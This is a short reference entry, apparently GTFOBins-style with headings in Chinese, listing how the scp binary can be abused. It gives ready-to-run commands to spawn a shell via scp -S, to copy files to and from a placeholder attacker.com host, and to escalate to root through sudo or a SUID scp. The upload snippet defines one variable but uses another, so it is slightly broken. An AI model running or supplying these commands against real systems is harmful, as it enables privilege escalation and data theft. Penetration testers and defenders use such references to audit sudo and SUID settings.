.. / scp

shell

用来生成一个交互式的系统shell。

• TF=$(mktemp)
  echo 'sh 0<&2 1>&2' > $TF
  chmod +x "$TF"
  scp -S $TF x y:
  

file-upload

上传文件到外部。

• Send local file to a SSH server.

  RPATH=user@attacker.com:~/file_to_save
  LPATH=要发送的文件
  scp $LFILE $RPATH
  

file-download

下载远程文件。

• Fetch a remote file from a SSH server.

  RPATH=user@attacker.com:~/file_to_get
  LFILE=file_to_save
  scp $RPATH $LFILE
  

sudo

如果二进制文件被 sudo 允许以超级用户身份运行，可能被用于访问文件系统、提升或维持特权访问。

• TF=$(mktemp)
  echo 'sh 0<&2 1>&2' > $TF
  chmod +x "$TF"
  sudo scp -S $TF x y:
  

limited-suid

suid是一种授予文件的权限类型，它允许用户使用者以文件所有者的权限来执行文件。

• TF=$(mktemp)
  echo 'sh 0<&2 1>&2' > $TF
  chmod +x "$TF"
  ./scp -S $TF a b: